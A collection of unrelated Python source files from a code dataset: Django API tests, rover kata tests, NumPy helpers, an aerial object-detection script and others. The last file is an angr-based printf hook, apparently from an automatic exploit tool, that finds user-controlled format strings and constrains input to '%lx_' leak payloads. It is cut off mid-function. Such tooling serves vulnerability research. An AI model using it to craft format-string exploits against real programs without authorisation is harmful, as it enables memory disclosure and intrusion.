id
stringlengths 2
8
| text
stringlengths 16
264k
| dataset_id
stringclasses 1
value |
---|---|---|
5154983
|
<reponame>maykinmedia/bluebottle
import json
from django.test import TestCase
from django.core.urlresolvers import reverse
from bluebottle.test.factory_models.projects import (
ProjectFactory, ProjectThemeFactory,
ProjectPhaseFactory)
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.utils import InitProjectDataMixin, BluebottleTestCase
from rest_framework import status
from ..models import ProjectPhase, ProjectTheme
class ProjectEndpointTestCase(BluebottleTestCase):
"""
Base class for ``projects`` app API endpoints test cases.
Sets up a common set of three ``Project``s and three ``ProjectTheme``s,
as well as a dummy testing user which can be used for unit tests.
"""
def setUp(self):
super(ProjectEndpointTestCase, self).setUp()
self.user = BlueBottleUserFactory.create()
self.user_token = "JWT {0}".format(self.user.get_jwt_token())
self.phase_1 = ProjectPhase.objects.get(slug='plan-new')
self.phase_2 = ProjectPhase.objects.get(slug='plan-submitted')
self.phase_3 = ProjectPhase.objects.get(slug='campaign')
self.theme_1 = ProjectTheme.objects.get(id=1)
self.theme_2 = ProjectTheme.objects.get(id=2)
self.theme_3 = ProjectTheme.objects.get(id=3)
self.project_1 = ProjectFactory.create(owner=self.user, status=self.phase_1, theme=self.theme_1)
self.project_2 = ProjectFactory.create(owner=self.user, status=self.phase_2, theme=self.theme_2)
self.project_3 = ProjectFactory.create(owner=self.user, status=self.phase_3, theme=self.theme_3)
class TestProjectPhaseList(ProjectEndpointTestCase):
"""
Test case for the ``ProjectPhase`` API view. Returns all the Phases
that can be assigned to a project.
Endpoint: /api/projects/phases/
"""
def test_api_phases_list_endpoint(self):
"""
Tests that the list of project phases can be obtained from its
endpoint.
"""
response = self.client.get(reverse('project_phase_list'))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
available_phases = ProjectPhase.objects.all()
self.assertEqual(data['count'], len(available_phases),
"Failed to load all the available phases")
for item in data['results']:
self.assertIn('id', item)
self.assertIn('name', item)
self.assertIn('description', item)
self.assertIn('sequence', item)
self.assertIn('active', item)
self.assertIn('editable', item)
self.assertIn('viewable', item)
class TestProjectList(ProjectEndpointTestCase):
"""
Test case for the ``ProjectList`` API view.
Endpoint: /api/projects/projects/
"""
def test_api_project_list_endpoint(self):
"""
Test the API endpoint for Projects list.
"""
response = self.client.get(reverse('project_list'))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
# Check that it is returning our 1 viewable factory-model project.
self.assertEqual(data['count'], 1)
# Check sanity on the JSON response.
for item in data['results']:
self.assertIn('created', item)
self.assertIn('description', item)
self.assertIn('id', item)
self.assertIn('image', item)
self.assertIn('meta_data', item)
self.assertIn('owner', item)
self.assertIn('status', item)
#Ensure that non-viewable status are filtered out
phase = ProjectPhase.objects.get(id=item['status'])
self.assertTrue(phase.viewable, "Projects with non-viewable status were returned")
def test_api_project_list_endpoint_status_viewable(self):
"""
Test that the non-viewable projects are not returned by the API.
"""
self.phase_3.viewable = False
self.phase_3.save()
# So, now our ``self.project_3`` should be non-viewable...
response = self.client.get(reverse('project_list'))
data = json.loads(response.content)
# We created 3 projects, but none are viewable with the updated to phase_3...
self.assertEqual(data['count'], 0)
class TestProjectDetail(ProjectEndpointTestCase):
"""
Test case for the ``ProjectDetail`` API view.
Endpoint: /api/projects/projects/{slug}
"""
def test_api_project_detail_endpoint(self):
"""
Test the API endpoint for Project detail.
"""
response = self.client.get(
reverse('project_detail', kwargs={'slug': self.project_1.slug}))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertIn('created', data)
self.assertIn('description', data)
self.assertIn('id', data)
self.assertIn('image', data)
self.assertIn('meta_data', data)
self.assertIn('owner', data)
self.assertIn('status', data)
class TestProjectPreviewList(ProjectEndpointTestCase):
"""
Test case for the ``ProjectPreviewList`` API view.
Endpoint: /api/projects/previews
"""
def test_api_project_preview_list_endpoint(self):
"""
Test the API endpoint for Project preview list.
"""
response = self.client.get(reverse('project_preview_list'))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data['count'], 1)
for item in data['results']:
self.assertIn('id', item)
self.assertIn('title', item)
self.assertIn('image', item)
self.assertIn('status', item)
self.assertIn('country', item)
class TestProjectPreviewDetail(ProjectEndpointTestCase):
"""
Test case for the ``ProjectPreviewDetail`` API view.
Endpoint: /api/projects/preview/{slug}
"""
def test_api_project_preview_detail_endpoint(self):
"""
Test the API endpoint for Project preview detail.
"""
response = self.client.get(
reverse('project_preview_detail',
kwargs={'slug': self.project_1.slug}))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertIn('id', data)
self.assertIn('title', data)
self.assertIn('image', data)
self.assertIn('status', data)
self.assertIn('country', data)
class TestProjectThemeList(ProjectEndpointTestCase):
"""
Test case for the ``ProjectThemeList`` API view.
Endpoint: /api/projects/themes
"""
def test_api_project_theme_list_endpoint(self):
"""
Test the API endpoint for Project theme list.
"""
response = self.client.get(reverse('project_theme_list'))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(len(data), 3)
for item in data:
self.assertIn('id', item)
self.assertIn('name', item)
class TestProjectThemeDetail(ProjectEndpointTestCase):
"""
Test case for the ``ProjectThemeDetail`` API view.
Endpoint: /api/projects/themes/{pk}
"""
def test_api_project_theme_detail_endpoint(self):
"""
Test the API endpoint for Project theme detail.
"""
response = self.client.get(
reverse('project_theme_detail', kwargs={'pk': self.project_1.pk}))
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertIn('id', data)
self.assertIn('name', data)
class TestManageProjectList(ProjectEndpointTestCase):
"""
Test case for the ``ManageProjectList`` API view.
Endpoint: /api/projects/manage
"""
def test_api_manage_project_list_endpoint_login_required(self):
"""
Test login required for the API endpoint for manage Project list.
"""
response = self.client.get(reverse('project_manage_list'))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, response.data)
data = json.loads(response.content)
self.assertEqual(
data['detail'], 'Authentication credentials were not provided.')
def test_api_manage_project_list_endpoint_success(self):
"""
Test successful request for a logged in user over the API endpoint for
manage Project list.
"""
response = self.client.get(reverse('project_manage_list'), HTTP_AUTHORIZATION=self.user_token)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data['count'], 3)
for item in data['results']:
self.assertIn('id', item)
self.assertIn('created', item)
self.assertIn('title', item)
self.assertIn('url', item)
self.assertIn('status', item)
self.assertIn('image', item)
self.assertIn('pitch', item)
self.assertIn('description', item)
self.assertIn('country', item)
self.assertIn('editable', item)
def test_api_manage_project_list_endpoint_post(self):
"""
Test successful POST request over the API endpoint for manage Project
list.
"""
post_data = {
'slug': 'test-project',
'title': 'Testing Project POST request',
'pitch': 'A new project to be used in unit tests',
'theme': self.theme_1.pk,
'status': self.phase_1.pk
}
response = self.client.post(reverse('project_manage_list'), post_data, HTTP_AUTHORIZATION=self.user_token)
self.assertEqual(response.status_code, 201)
data = json.loads(response.content)
self.assertIn('id', data)
self.assertIn('created', data)
self.assertIn('title', data)
self.assertIn('url', data)
self.assertIn('status', data)
self.assertIn('image', data)
self.assertIn('pitch', data)
self.assertIn('description', data)
self.assertIn('country', data)
self.assertIn('editable', data)
class TestManageProjectDetail(ProjectEndpointTestCase):
"""
Test case for the ``ManageProjectDetail`` API view.
Endpoint: /api/projects/manage/{slug}
"""
def test_api_manage_project_detail_endpoint_login_required(self):
"""
Test login required for the API endpoint for manage Project detail.
"""
response = self.client.get(
reverse('project_manage_detail', kwargs={'slug': self.project_1.slug}))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN, response.data)
data = json.loads(response.content)
self.assertEqual(
data['detail'], 'Authentication credentials were not provided.')
def test_api_manage_project_detail_endpoint_not_owner(self):
"""
Test unauthorized request made by a user who is not the owner of the
Project over the API endpoint for manage Project detail.
"""
user = BlueBottleUserFactory.create(
email='<EMAIL>',
username='janedoe'
)
token = "JWT {0}".format(user.get_jwt_token())
response = self.client.get(
reverse('project_manage_detail', kwargs={'slug': self.project_1.slug}),
HTTP_AUTHORIZATION=token)
self.assertEqual(response.status_code, 403)
data = json.loads(response.content)
self.assertEqual(
data['detail'], 'You do not have permission to perform this action.')
def test_api_manage_project_detail_endpoint_success(self):
"""
Test successful request for a logged in user over the API endpoint for
manage Project detail.
"""
response = self.client.get(
reverse('project_manage_detail', kwargs={'slug': self.project_1.slug}),
HTTP_AUTHORIZATION=self.user_token)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertIn('id', data)
self.assertIn('created', data)
self.assertIn('title', data)
self.assertIn('url', data)
self.assertIn('status', data)
self.assertIn('image', data)
self.assertIn('pitch', data)
self.assertIn('description', data)
self.assertIn('country', data)
self.assertIn('editable', data)
|
StarcoderdataPython
|
87349
|
<reponame>bmanzella/zhuartcc.org<gh_stars>1-10
from django.contrib import admin
from .models import Event, EventPosition, PositionPreset, EventPositionRequest, EventScore
@admin.register(Event)
class EventAdmin(admin.ModelAdmin):
list_display = ('name', 'host', 'start', 'end', 'hidden')
@admin.register(EventPosition)
class EventPositionAdmin(admin.ModelAdmin):
list_display = ('event', 'user', 'name')
@admin.register(EventPositionRequest)
class EventPositionRequestAdmin(admin.ModelAdmin):
list_display = ('position', 'user')
@admin.register(PositionPreset)
class PositionPresetAdmin(admin.ModelAdmin):
list_display = ('name', 'positions_json')
@admin.register(EventScore)
class EventScoreAdmin(admin.ModelAdmin):
list_display = ('user', 'event', 'score')
|
StarcoderdataPython
|
1967264
|
from rover import turn, move, Position, Plateau, Rover, parse, World, main
import pytest
def test_turn_left():
assert turn('N', 'L') == 'W'
assert turn('W', 'L') == 'S'
assert turn('S', 'L') == 'E'
assert turn('E', 'L') == 'N'
def test_turn_right():
assert turn('N', 'R') == 'E'
assert turn('W', 'R') == 'N'
assert turn('S', 'R') == 'W'
assert turn('E', 'R') == 'S'
def test_move():
assert move( Position(1,2,'N') ) == Position(1,3,'N')
assert move( Position(1,2,'W')) == Position(0,2,'W')
assert move( Position(1,2,'S')) == Position(1,1,'S')
assert move( Position(1,2,'E')) == Position(2,2,'E')
def test_illegal_plateau():
with pytest.raises(ValueError):
Plateau(0,0)
def test_ok_plateau():
assert Plateau(1,2).max_x == 1
assert Plateau(1,2).max_y == 2
def test_plateau_contains():
assert Plateau(1,0).contains(Position(0, 0, 'W'))
assert Plateau(1,0).contains(Position(1, 0, 'W'))
assert Plateau(1,0).contains(Position(-1, 0, 'W')) is False
assert Plateau(1,0).contains(Position(0, -1, 'W')) is False
assert Plateau(1,0).contains(Position(1, 1, 'W')) is False
assert Plateau(1,0).contains(Position(0, 1, 'W')) is False
def test_move_rover_on_plateau():
plateau = Plateau(5,5)
rover = Rover( Position(1,2,'N'), plateau)
rover.move()
assert rover.position == Position(1,3, 'N')
def test_move_rover_over_edge():
plateau = Plateau(0,1)
rover = Rover( Position(0,1,'N'), plateau)
with pytest.raises(ValueError):
rover.move()
def test_parse_input():
input = """\
5 5
1 2 N
LMLMLMLMM
3 3 E
MMRMMRMRRM
"""
world = parse(input)
assert world.plateau == Plateau(5,5)
assert str(world.rovers) == "[Rover(Position(x=1, y=2, heading='N'), Plateau(max_x=5, max_y=5)), Rover(Position(x=3, y=3, heading='E'), Plateau(max_x=5, max_y=5))]"
assert str(world.instructions) == "['LMLMLMLMM', 'MMRMMRMRRM']"
def test_move_world():
rovers = [Rover(Position(x=1, y=2, heading='N'), Plateau(max_x=5, max_y=5)), Rover(Position(x=3, y=3, heading='E'), Plateau(max_x=5, max_y=5))]
world = World(Plateau(5, 5))
world.rovers = rovers
world.instructions = ["LMLMLMLMM", "MMRMMRMRRM"]
world.follow_instructions()
assert world.rovers[0].position == Position(1, 3, 'N')
assert world.rovers[1].position == Position(5, 1, 'E')
def test_report_position():
plateau = Plateau(0,1)
rover = Rover( Position(0,1,'N'), plateau)
assert "0 1 N\n" == rover.report_position()
def test_main():
input = """\
5 5
1 2 N
LMLMLMLMM
3 3 E
MMRMMRMRRM
"""
output = main(input)
expected_output = """\
1 3 N
5 1 E
"""
assert output == expected_output
|
StarcoderdataPython
|
1932803
|
<filename>boilerplate/helpers/enterinteractivemode.py
'''
Created on Jul 9, 2018
@author: havrila
'''
def interactive():
import code
code.interact(local=locals())
|
StarcoderdataPython
|
245640
|
<filename>yakut/enum_param.py
# Copyright (c) 2020 OpenCyphal
# This software is distributed under the terms of the MIT License.
# Author: <NAME> <<EMAIL>>
import enum
import typing
import click
class EnumParam(click.Choice):
"""
A parameter that allows the user to select one of the enum options.
The selection is case-insensitive and abbreviations are supported out of the box:
F, foo, and FOO_BAR are all considered equivalent as long as there are no ambiguities.
"""
def __init__(self, e: enum.EnumMeta) -> None:
self._enum = e
super().__init__(list(e.__members__), case_sensitive=False)
def convert(
self,
value: typing.Union[str, enum.Enum],
param: typing.Optional[click.Parameter],
ctx: typing.Optional[click.Context],
) -> typing.Any:
if isinstance(value, enum.Enum): # This is to support default enum options.
value = value.name
assert isinstance(value, str)
candidates: typing.List[enum.Enum] = [ # type: ignore
x for x in self._enum if x.name.upper().startswith(value.upper())
]
if len(candidates) == 0:
raise click.BadParameter(f"Value {value!r} is not a valid choice for {list(self._enum.__members__)}")
if len(candidates) > 1:
raise click.BadParameter(f"Value {value!r} is ambiguous; possible matches: {[x.name for x in candidates]}")
return candidates[0]
|
StarcoderdataPython
|
11280252
|
# -*- coding: utf-8 -*-
"""<div> template"""
from ..environment import env
div = env.from_string("""\
<div {% if align -%} align="{{ align }}" {% endif -%}>
{%- if text -%} {{ text }} {%- endif -%}</div>
""")
|
StarcoderdataPython
|
8063727
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""linebot.models.emojis module."""
from __future__ import unicode_literals
from abc import ABCMeta
from future.utils import with_metaclass
from .base import Base
class Emojis(with_metaclass(ABCMeta, Base)):
"""Emojis.
https://developers.line.biz/en/reference/messaging-api/#text-message
"""
def __init__(self, index=None, product_id=None, emoji_id=None, **kwargs):
"""__init__ method.
:param kwargs:
"""
super(Emojis, self).__init__(**kwargs)
self.index = index
self.product_id = product_id
self.emoji_id = emoji_id
|
StarcoderdataPython
|
11302733
|
import os
import sys
from Bio import SeqIO
from Bio.Seq import Seq
def main(*args, **kwargs):
fpath = os.path.join(os.getcwd(), args[-1])
records = list(SeqIO.parse(fpath,'fasta'))
s = str(records[0].seq)
t = str(records[1].seq)
idxs = []
idx = 0
for m in t:
idx = s.find(m,idx)
idx += 1
idxs.append(idx)
for idx in idxs:
print idx,
if __name__ == '__main__':
main(*sys.argv)
|
StarcoderdataPython
|
1905831
|
<reponame>neuron-ai/easyneuron
from io import BufferedReader, BufferedWriter
from typing import (Any, Iterable, List, Sequence, Set,
Sized, SupportsFloat, SupportsInt, Tuple, Union)
from numpy import (float16, float32, float64, int0, int8, int16, int32, int64,
ndarray)
# Numerical
NumpyFloat = Union[float64, float32, float16] # Numpy Float types
NumpyInt = Union[int0, int8, int16, int32, int64] # Numpy Int types
BuiltinNumbers = Union[int, float] # Builtin number types
# Any numerical, or numpy numerical types
Numerical = Union[BuiltinNumbers, NumpyFloat, NumpyInt, SupportsInt, SupportsFloat]
# External types for set-like objects
ExternalSets = ndarray
BuiltinSets = Union[List, Tuple, Set] # Builtin set-like types
SequentialObject = Union[ExternalSets, BuiltinSets] # All set-like objects
Data = Union[
SequentialObject, Numerical
] # A Union of sequences that can be used alonside numerical values
X_Data = Sequence[Sequence[Numerical]] # 2D Arrays
ArrayLike = Union[SequentialObject, Iterable, Sequence, Sized, Any]
# Files
WritableFile = Union[str, BufferedWriter]
ReadableFile = Union[str, BufferedReader]
|
StarcoderdataPython
|
9682545
|
from typing import *
import numpy as np
from ..typing_ import *
from .misc import generate_random_seed
__all__ = [
'get_array_shape', 'to_number_or_numpy', 'minibatch_slices_iterator',
'arrays_minibatch_iterator', 'split_numpy_arrays', 'split_numpy_array',
]
def get_array_shape(arr) -> ArrayShape:
"""
Inspect the shape of an array-like object.
>>> get_array_shape(1)
()
>>> get_array_shape(2.5)
()
>>> get_array_shape(np.zeros([1, 2, 3]))
(1, 2, 3)
Args:
arr: The array-like object.
Returns:
The shape of the array.
"""
if isinstance(arr, (float, int)):
return ()
if hasattr(arr, 'shape'):
# TensorFlow, PyTorch and NumPy tensors should all have ``.shape``
return tuple(arr.shape)
return np.shape(arr)
def to_number_or_numpy(arr) -> Union[np.ndarray, float, int]:
"""
Convert an array-like object into NumPy array or int/float number.
Args:
arr: The array-like object.
Returns:
The converted NumPy array.
"""
if isinstance(arr, (float, int, np.ndarray)):
return arr
elif hasattr(arr, 'numpy'):
# TensorFlow and PyTorch tensor has ``.numpy()``.
if hasattr(arr, 'detach'): # PyTorch further requires ``.detach()`` before calling ``.numpy()``
arr = arr.detach()
if hasattr(arr, 'cpu'): # PyTorch further requires ``.cpu()`` before calling ``.numpy()``
arr = arr.cpu()
return arr.numpy()
else:
return np.array(arr)
def minibatch_slices_iterator(length: int,
batch_size: int,
skip_incomplete: bool = False
) -> Generator[slice, None, None]:
"""
Iterate through all the mini-batch slices.
Args:
length: Total length of data in an epoch.
batch_size: Size of each mini-batch.
skip_incomplete: If :obj:`True`, discard the final
batch if it contains less than `batch_size` number of items.
(default :obj:`False`)
Yields
Slices of each mini-batch. The last mini-batch may contain less
indices than `batch_size`.
"""
start = 0
stop1 = (length // batch_size) * batch_size
while start < stop1:
yield slice(start, start + batch_size, 1)
start += batch_size
if not skip_incomplete and start < length:
yield slice(start, length, 1)
def arrays_minibatch_iterator(arrays: Sequence[Array],
batch_size: int,
skip_incomplete: bool = False
) -> Generator[slice, None, None]:
"""
Iterate through all the mini-batches in the arrays.
Args:
arrays: Total length of data in an epoch.
batch_size: Size of each mini-batch.
skip_incomplete: If :obj:`True`, discard the final
batch if it contains less than `batch_size` number of items.
(default :obj:`False`)
Yields
Tuple of arrays of each mini-batch. The last mini-batch may contain
less indices than `batch_size`.
"""
length = len(arrays[0])
for slc in minibatch_slices_iterator(
length, batch_size=batch_size, skip_incomplete=skip_incomplete):
yield tuple(a[slc] for a in arrays)
def split_numpy_arrays(arrays: Sequence[np.ndarray],
portion: Optional[float] = None,
size: Optional[int] = None,
shuffle: bool = True,
random_state: Optional[np.random.RandomState] = None
) -> Tuple[Tuple[np.ndarray, ...],
Tuple[np.ndarray, ...]]:
"""
Split numpy arrays into two halves, by portion or by size.
Args:
arrays: Numpy arrays to be splitted.
portion: Portion of the second half. Ignored if `size` is specified.
size: Size of the second half.
shuffle: Whether or not to shuffle before splitting?
random_state: Optional numpy RandomState for shuffling data. (default
:obj:`None`, construct a new :class:`np.random.RandomState`).
Returns:
The two halves of the arrays after splitting.
"""
# check the arguments
if size is None and portion is None:
raise ValueError('At least one of `portion` and `size` should '
'be specified.')
# zero arrays should return empty tuples
arrays = tuple(arrays)
if not arrays:
return (), ()
# check the length of provided arrays
data_count = len(arrays[0])
for array in arrays[1:]:
if len(array) != data_count:
raise ValueError('The length of specified arrays are not equal.')
# determine the size for second half
if size is None:
if portion < 0.0 or portion > 1.0:
raise ValueError('`portion` must range from 0.0 to 1.0.')
elif portion < 0.5:
size = data_count - int(data_count * (1.0 - portion))
else:
size = int(data_count * portion)
# shuffle the data if necessary
if shuffle:
random_state = \
random_state or np.random.RandomState(generate_random_seed())
indices = np.arange(data_count)
random_state.shuffle(indices)
arrays = tuple(a[indices] for a in arrays)
# return directly if each side remains no data after splitting
if size <= 0:
return arrays, tuple(a[:0] for a in arrays)
elif size >= data_count:
return tuple(a[:0] for a in arrays), arrays
# split the data according to demand
return (
tuple(v[: -size, ...] for v in arrays),
tuple(v[-size:, ...] for v in arrays)
)
def split_numpy_array(array: np.ndarray,
portion: Optional[float] = None,
size: Optional[int] = None,
shuffle: bool = True) -> Tuple[np.ndarray, ...]:
"""
Split numpy array into two halves, by portion or by size.
Args:
array: A numpy array to be splitted.
portion: Portion of the second half. Ignored if `size` is specified.
size: Size of the second half.
shuffle: Whether or not to shuffle before splitting?
Returns:
The two halves of the array after splitting.
"""
(a,), (b,) = split_numpy_arrays((array,), portion=portion, size=size,
shuffle=shuffle)
return a, b
|
StarcoderdataPython
|
196
|
# -*- encoding:utf-8 -*-
# @Time : 2021/1/3 15:15
# @Author : gfjiang
import os.path as osp
import mmcv
import numpy as np
import cvtools
import matplotlib.pyplot as plt
import cv2.cv2 as cv
from functools import partial
import torch
import math
from cvtools.utils.path import add_prefix_filename_suffix
from mmdet.ops import nms
from mmdet.apis import init_detector, inference_detector
def draw_features(module, input, output, work_dir='./'):
x = output.cpu().numpy()
out_channels = list(output.shape)[1]
height = int(math.sqrt(out_channels))
width = height
if list(output.shape)[2] < 128:
return
fig = plt.figure(figsize=(32, 32))
fig.subplots_adjust(left=0.05, right=0.95, bottom=0.05, top=0.95, wspace=0.05, hspace=0.05)
for i in range(height * width):
plt.subplot(height, width, i + 1)
plt.axis('off')
img = x[0, i, :, :]
pmin = np.min(img)
pmax = np.max(img)
img = ((img - pmin) / (pmax - pmin + 0.000001))*255 # float在[0,1]之间,转换成0-255
img = img.astype(np.uint8) # 转成unit8
img = cv.applyColorMap(img, cv.COLORMAP_JET) # 生成heat map
img = img[:, :, ::-1] # 注意cv2(BGR)和matplotlib(RGB)通道是相反的
plt.imshow(img)
# print("{}/{}".format(i,width*height))
savename = get_image_name_for_hook(module, work_dir)
fig.savefig(savename, dpi=100)
fig.clf()
plt.close()
def get_image_name_for_hook(module, work_dir='./'):
"""
Generate image filename for hook function
Parameters:
-----------
module: module of neural network
"""
# os.makedirs(work_dir, exist_ok=True)
module_name = str(module)
base_name = module_name.split('(')[0]
index = 0
image_name = '.' # '.' is surely exist, to make first loop condition True
while osp.exists(image_name):
index += 1
image_name = osp.join(
work_dir, 'feats', '%s_%d.png' % (base_name, index))
return image_name
class AerialDetectionOBB(object):
def __init__(self, config, pth):
self.imgs = []
self.cfg = mmcv.Config.fromfile(config)
self.pth = pth
print('loading model {} ...'.format(pth))
self.model = init_detector(self.cfg, self.pth, device='cuda:0')
self.results = []
self.img_detected = []
# self.vis_feats((torch.nn.Conv2d, torch.nn.MaxPool2d))
def __call__(self,
imgs_or_path,
det_thrs=0.5,
vis=False,
vis_thr=0.5,
save_root=''):
if isinstance(imgs_or_path, str):
self.imgs += cvtools.get_files_list(imgs_or_path)
else:
self.imgs += imgs_or_path
prog_bar = mmcv.ProgressBar(len(self.imgs))
for _, img in enumerate(self.imgs):
self.detect(img, det_thrs=det_thrs, vis=vis,
vis_thr=vis_thr, save_root=save_root)
prog_bar.update()
def detect(self,
img,
det_thrs=0.5,
vis=False,
vis_thr=0.5,
save_root=''):
result = inference_detector(self.model, img)
# result = self.nms(result)
if isinstance(det_thrs, float):
det_thrs = [det_thrs] * len(result)
if vis:
to_file = osp.join(save_root, osp.basename(img))
to_file = add_prefix_filename_suffix(to_file, suffix='_obb')
self.vis(img, result, vis_thr=vis_thr, to_file=to_file)
result = [det[det[..., -1] > det_thr] for det, det_thr
in zip(result, det_thrs)]
if len(result) == 0:
print('detect: image {} has no object.'.format(img))
self.img_detected.append(img)
self.results.append(result)
return result
def nms(self, result, nms_th=0.3):
dets_num = [len(det_cls) for det_cls in result]
result = np.vstack(result)
_, ids = nms(result, nms_th)
total_num = 0
nms_result = []
for num in dets_num:
ids_cls = ids[np.where((total_num <= ids) & (ids < num))[0]]
nms_result.append(result[ids_cls])
total_num += num
return nms_result
def vis(self, img, bbox_result, vis_thr=0.5,
to_file='vis.jpg'):
bboxes = np.vstack(bbox_result)
labels = [
np.full(bbox.shape[0], i, dtype=np.int32)
for i, bbox in enumerate(bbox_result)
]
labels = np.concatenate(labels)
inds = np.where(bboxes[:, -1] > vis_thr)[0]
bboxes = bboxes[inds]
labels = labels[inds]
texts = [self.model.CLASSES[index]+'|'+str(round(bbox[-1], 2))
for index, bbox in zip(labels, bboxes)]
img = cvtools.draw_boxes_texts(
img, bboxes[:, :-1], box_format='polygon', line_width=2)
cvtools.imwrite(img, to_file)
def vis_feats(self, modules_for_plot):
h, w = self.cfg.data.train.img_scale
for name, module in self.model.named_modules():
if isinstance(module, modules_for_plot):
draw_features_func = partial(
draw_features, work_dir=self.cfg.work_dir)
module.register_forward_hook(draw_features_func)
def save_results(self, save):
str_results = ''
for i, img in enumerate(self.img_detected):
result = self.results[i]
img = osp.basename(img)
for cls_index, dets in enumerate(result):
cls = self.model.CLASSES[cls_index]
for box in dets:
bbox_str = ','.join(map(str, map(int, box[:4])))
str_results += ' '.join([img, cls, bbox_str]) + '\n'
with open(save, 'w') as f:
f.write(str_results)
if __name__ == '__main__':
config_file = 'configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota_1gpus_mdanet2.py'
pth_file = 'work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota_1gpus_mdanet2/epoch_12.pth'
detector = AerialDetectionOBB(config_file, pth_file)
detector('/media/data/DOTA/crop/P2701_2926_1597_3949_2620.png', vis=True,
save_root='work_dirs/attention_vis/')
detector.save_results('work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota_1gpus_mdanet2/detect_result.txt')
|
StarcoderdataPython
|
1850535
|
"""
Tested with:
Python 3.7.7
scikit-learn==0.24.2
"""
import json
import joblib
from sklearn import svm
from sklearn import datasets
classes = {"0": "Setosa", "1": "Versicolour", "2": "Virginica" }
clf = svm.SVC(gamma='scale', probability=True)
iris = datasets.load_iris()
X, y = iris.data, iris.target
clf.fit(X, y)
###
# Export / Store
###
joblib.dump(clf, open("model.joblib", "wb"))
with open("classes.json", "w") as f:
f.write(json.dumps(classes))
|
StarcoderdataPython
|
1951025
|
from pwn import *
import angr
import claripy
import tqdm
from .simgr_helper import get_trimmed_input
import logging
import copy
log = logging.getLogger(__name__)
# Better symbolic strlen
def get_max_strlen(state, value):
i = 0
for c in value.chop(8): # Chop by byte
i += 1
if not state.solver.satisfiable([c != 0x00]):
log.debug("Found the null at offset : {}".format(i))
return i - 1
return i
"""
Model either printf("User input") or printf("%s","Userinput")
"""
class printFormat(angr.procedures.libc.printf.printf):
IS_FUNCTION = True
input_index = 0
"""
Checks userinput arg
"""
def __init__(self, input_index):
# Set user input index for different
# printf types
self.input_index = input_index
angr.procedures.libc.printf.printf.__init__(self)
def checkExploitable(self, fmt):
bits = self.state.arch.bits
load_len = int(bits / 8)
max_read_len = 1024
"""
For each value passed to printf
Check to see if there are any symbolic bytes
Passed in that we control
"""
i = self.input_index
state = self.state
solv = state.solver.eval
# fmt_len = self._sim_strlen(fmt)
# # We control format specifier and strlen isn't going to be helpful,
# # just set it ourselves
# if len(state.solver.eval_upto(fmt_len,2)) > 1:
# while not state.satisfiable(extra_constraints=[fmt_len == max_read_len]):
# max_read_len -=1
# if max_read_len < 0:
# raise Exception("fmt string with no length!")
# state.add_constraints(fmt_len == max_read_len)
printf_arg = self.arguments[i]
var_loc = solv(printf_arg)
# Parts of this argument could be symbolic, so we need
# to check every byte
var_data = state.memory.load(var_loc, max_read_len)
var_len = get_max_strlen(state, var_data)
fmt_len = self._sim_strlen(fmt)
# if len(state.solver.eval_upto(fmt_len,2)) > 1:
# state.add_constraints(fmt_len == var_len)
# Reload with just our max len
var_data = state.memory.load(var_loc, var_len)
log.info("Building list of symbolic bytes")
symbolic_list = [
state.memory.load(var_loc + x, 1).symbolic for x in range(var_len)
]
log.info("Done Building list of symbolic bytes")
"""
Iterate over the characters in the string
Checking for where our symbolic values are
This helps in weird cases like:
char myVal[100] = "I\'m cool ";
strcat(myVal,STDIN);
printf(myVal);
"""
position = 0
count = 0
greatest_count = 0
prev_item = symbolic_list[0]
for i in range(1, len(symbolic_list)):
if symbolic_list[i] and symbolic_list[i] == symbolic_list[i - 1]:
count = count + 1
if count > greatest_count:
greatest_count = count
position = i - count
else:
if count > greatest_count:
greatest_count = count
position = i - 1 - count
# previous position minus greatest count
count = 0
log.info(
"[+] Found symbolic buffer at position {} of length {}".format(
position, greatest_count
)
)
if greatest_count > 0:
str_val = b"%lx_"
if bits == 64:
str_val = b"%llx_"
if self.can_constrain_bytes(
state, var_data, var_loc, position, var_len, strVal=str_val
):
log.info("[+] Can constrain bytes")
log.info("[+] Constraining input to leak")
self.constrainBytes(
state,
var_data,
var_loc,
position,
var_len,
strVal=str_val,
)
# Verify solution
# stdin_str = str(state_copy.posix.dumps(0))
# user_input = self.state.globals["inputType"]
# if str_val in solv(user_input):
# var_value = self.state.memory.load(var_loc)
# self.constrainBytes(
# self.state, var_value, var_loc, position, var_value_length
# )
# print("[+] Vulnerable path found {}".format(vuln_string))
user_input = state.globals["user_input"]
self.state.globals["input"] = solv(user_input, cast_to=bytes)
self.state.globals["type"] = "Format"
self.state.globals["position"] = position
self.state.globals["length"] = greatest_count
return True
return False
def can_constrain_bytes(self, state, symVar, loc, position, length, strVal=b"%x_"):
total_region = self.state.memory.load(loc, length)
total_format = strVal * length
# If we can constrain it all in one go, then let's do it!
if state.solver.satisfiable(
extra_constraints=[total_region == total_format[:length]]
):
log.info("Can constrain it all, let's go!")
state.add_constraints(total_region == total_format[:length])
return True
for i in tqdm.tqdm(range(length), total=length, desc="Checking Constraints"):
strValIndex = i % len(strVal)
curr_byte = self.state.memory.load(loc + i, 1)
if not state.solver.satisfiable(
extra_constraints=[curr_byte == strVal[strValIndex]]
):
return False
return True
def constrainBytes(self, state, symVar, loc, position, length, strVal=b"%x_"):
total_region = self.state.memory.load(loc, length)
total_format = strVal * length
